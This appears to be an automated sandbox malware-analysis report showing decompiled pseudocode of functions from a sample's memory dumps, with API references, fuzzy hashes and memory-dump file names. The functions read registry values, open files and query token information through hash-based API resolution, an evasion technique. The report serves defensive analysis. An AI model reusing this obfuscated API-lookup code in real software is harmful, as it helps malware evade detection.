Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: efd5f34ceaae2749ac1fa851ca67c14d799835936b409dcbe6cdd157b30469ec
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: A641E370244242EBFB55DFF89961BAF76D89F96308F588828F990CA194DB34C849C762

Uniqueness

Uniqueness Score: -1.00%

Function 6ED057B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6ED057B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6ED03064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6ECFF828(_a8, _t15);
							if(E6ED03064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6ECFF4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6ed057b8
0x6ed057b9
0x6ed057bb
0x6ed057c0
0x6ed057c7
0x6ed057cb
0x6ed057cb
0x6ed057cb
0x6ed057cf
0x6ed05815
0x6ed05815
0x6ed057d1
0x6ed057d1
0x6ed057d7
0x6ed057e0
0x6ed057e3
0x6ed057fa
0x6ed0580b
0x6ed0580b
0x6ed0580d
0x6ed05813
0x6ed0581e
0x6ed05836
0x6ed05856
0x6ed05856
0x6ed05858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed057d7
0x6ed05860

APIs

RegQueryValueExA.KERNELBASE(?,6ED0D1F8,00000000,?,00000000,00000000,?,?,?,6ED0D1F8,?,6ED05887,?,00000000,00000000), ref: 6ED0580B
RegQueryValueExA.KERNELBASE(?,6ED0D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6ED0D1F8,?,6ED05887,?,00000000), ref: 6ED05856

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 2c2e9de1d99c451949e9425ce0d2d5681d844f1eed91a2833ea4e3ca996940b3
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: BA11AF30209306EBD660DFA59C90EABBBDCEF86754F04891DB8948B141EB21E800DB75

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6ED05B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6ECFD1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6ECFD6D0(__ecx, _t60);
					E6ECFCFF8(_t56,  *_t60);
					E6ECFCFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6ED062B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6ECFC26C(_t40);
					if(E6ECFC280(_t40) != 0) {
						_t56[2] = E6ED035F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6ED03064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6ED03698(_t59, 0xff, 8);
						if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6ed05b43
0x6ed05b45
0x6ed05b52
0x6ed05b56
0x6ed05b5a
0x6ed05b64
0x6ed05b6b
0x6ed05b6b
0x6ed05b72
0x6ed05b74
0x6ed05b79
0x6ed05b82
0x6ed05b8a
0x6ed05b8a
0x6ed05b7b
0x6ed05b7d
0x6ed05b7d
0x6ed05b79
0x6ed05b8f
0x6ed05b9b
0x6ed05ccc
0x6ed05c09
0x6ed05c12
0x6ed05c13
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x00000000
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cae
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x00000000
0x6ed05c92
0x6ed05ba1
0x6ed05bb1
0x6ed05bb1

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f56d78ef1fb268de097a2fa71b690df70336ae5775d790b393bd59f57ce148
Instruction ID: d2a1a6c03fbed343bb9e130a3b32845bd0f6c37502cfdaf0ee2fb34ad854d3ab
Opcode Fuzzy Hash: 80f56d78ef1fb268de097a2fa71b690df70336ae5775d790b393bd59f57ce148
Instruction Fuzzy Hash: 7C31013038430AFEEAA02FF54D89F6B779DDF82648F084839FD419A1C5EA62D915C225

Uniqueness

Uniqueness Score: -1.00%

Function 00D926AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E00D91ED2(__eflags);
				_t29 = E00D9180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E00D9200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E00D91000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E00D916D7();
				 *_t56 = _v20; // executed
				E00D92092(_t47, _t54, _t55); // executed
				return 0;
			}

0x00d926aa
0x00d926b3
0x00d926b6
0x00d926b9
0x00d926c1
0x00d926c4
0x00d926cc
0x00d926cf
0x00d926d4
0x00d926da
0x00d926dd
0x00d926e0
0x00d926e0
0x00d9270e
0x00d92711
0x00d92719
0x00d9271c
0x00d9271f
0x00d92727
0x00d9272a
0x00d9272d
0x00d92734
0x00d92736
0x00d92739
0x00d9273c
0x00d9273f
0x00d92742
0x00d92706
0x00d92706
0x00d9276e
0x00d926ea
0x00d926ec
0x00d926ec
0x00d92749
0x00d9274c
0x00d92754
0x00d92757
0x00d92765

APIs

FreeConsole.KERNELBASE ref: 00D926EA

Memory Dump Source

Source File: 00000001.00000002.692433477.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 6cf1beaf0d4af46e8f2cbe8a4a50af3ded7f213675336dcbf22c109497a8bbcf
Instruction ID: 9b245cf803a7c1f199fec64b6f71b991166b7f0f384b9df708d9b4402760b8a1
Opcode Fuzzy Hash: 6cf1beaf0d4af46e8f2cbe8a4a50af3ded7f213675336dcbf22c109497a8bbcf
Instruction Fuzzy Hash: 8221D4B5D0421A9FCF04EFA9C8859BEBBF1FF08310F144529E445AB341E6359990CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED01166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6ed01168
0x6ed0116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6ED0117B

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 9824e4aa3a5846dc0fe1aab24a3a04f0d20db6706de39f3e2da32df4547e3531
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: DC110A30504293DBFB568FF89A71BAF76589F43308F584865E9B0D60E4DB24C859C662

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6ED05BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6ECFC26C(_t24);
					if(E6ECFC280(_t24) != 0) {
						_t33[2] = E6ED035F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6ED03064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6ED03698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6ed05be5
0x6ed05be7
0x6ed05bfe
0x6ed05c09
0x6ed05c12
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x6ed05cc6
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c72
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x6ed05c92
0x6ed05c92
0x6ed05be9
0x6ed05be9
0x6ed05bf0
0x6ed05bf0
0x6ed05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED05C3E

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: d03fb070480bc92f410d7b7bc10b72f190bfd2b6fe5488b0a36f591503b95ea2
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 58012634284206FAFAE01FE54C49F6B775CDF82248F084C35BD01561C9DF63A568C228

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6ED05BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6ECFC26C(_t24);
				if(E6ECFC280(_t24) != 0) {
					_t34[2] = E6ED035F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6ED03064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6ED03698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ed05bbd
0x6ed05bc1
0x6ed05bc4
0x6ed05bc7
0x6ed05c09
0x6ed05c12
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x6ed05cc6
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c72
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x6ed05c92
0x6ed05c92
0x6ed05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED05C3E

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: 42f80fba39c4d20449f5e1733815806925a1813c374c4f8a4723bf50f0b68045
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: BF01D63138430AFAFAA02FE54D49F7B775CDFC2658F084835BE01561C5EA5398558129

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ED05BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6ECFC26C(_t24);
				if(E6ECFC280(_t24) != 0) {
					_t34[2] = E6ED035F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6ED03064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6ED03698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ed05bd1
0x6ed05bd8
0x6ed05bdb
0x6ed05c09
0x6ed05c12
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x6ed05cc6
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c72
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x6ed05c92
0x6ed05c92
0x6ed05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED05C3E

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: bc4aab1ac0365d865058c83f6da63bf8ecfe28080c0dac59251f56083bbf7754
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 9B01F93538020ABAF7E02FE54D45F7B734DDF82258F084836BE01551C9EE239865C129

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6ED05BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6ECFC26C(_t23);
				if(E6ECFC280(_t23) != 0) {
					_t31[2] = E6ED035F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6ED03064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6ED03698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ed05bb3
0x6ed05bba
0x6ed05c09
0x6ed05c12
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x6ed05cc6
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c72
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x6ed05c92
0x6ed05c92
0x6ed05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED05C3E

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: bea196d8beb5c258fa7f6132fa041f66abf09ecb46d3f53e3ed828b5420f9f15
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: E101473128020AFAFAE02FE54C49FBB734CCF82258F084835BE01651C9EE23A965C138

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6ED05C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6ED03064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6ECFC26C(_t23);
				if(E6ECFC280(_t23) != 0) {
					_t31[2] = E6ED035F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6ED03064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6ED03698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6ED03064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ed05c01
0x6ed05c05
0x6ed05c09
0x6ed05c12
0x6ed05c18
0x6ed05c19
0x6ed05c0b
0x6ed05c0d
0x6ed05c0d
0x6ed05c2f
0x6ed05c43
0x6ed05c31
0x6ed05c3e
0x6ed05c40
0x6ed05c40
0x6ed05c45
0x6ed05c4a
0x6ed05c58
0x6ed05cc3
0x6ed05cc6
0x6ed05c5a
0x6ed05c5f
0x6ed05cac
0x6ed05cb0
0x6ed05cba
0x6ed05cba
0x6ed05cb0
0x6ed05c61
0x6ed05c6d
0x6ed05c72
0x6ed05c86
0x6ed05c88
0x6ed05c89
0x6ed05c8a
0x6ed05c8c
0x6ed05c8e
0x6ed05c8f
0x6ed05c8f
0x6ed05c92
0x6ed05c92
0x6ed05c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6ED05C3E

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
